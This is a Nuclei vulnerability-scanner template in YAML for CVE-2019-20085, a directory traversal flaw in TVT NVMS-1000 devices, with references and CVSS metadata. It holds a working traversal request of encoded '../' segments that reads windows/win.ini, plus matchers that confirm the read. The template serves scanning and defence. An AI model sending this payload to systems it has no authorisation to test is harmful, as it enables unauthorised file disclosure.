my-nuclei-templates/CVE-2019-20085.yaml

34 lines
940 B
YAML
Executable File

id: CVE-2019-20085
info:
name: TVT NVMS 1000 - Directory Traversal
author: daffainfo
severity: high
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
- https://www.exploit-db.com/exploits/48311
- https://www.exploit-db.com/exploits/47774
- http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-20085
cwe-id: CWE-22
tags: cve,cve2019,iot,lfi,cisa
requests:
- method: GET
path:
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "\\[(font|extension|file)s\\]"
part: body
- type: status
status:
- 200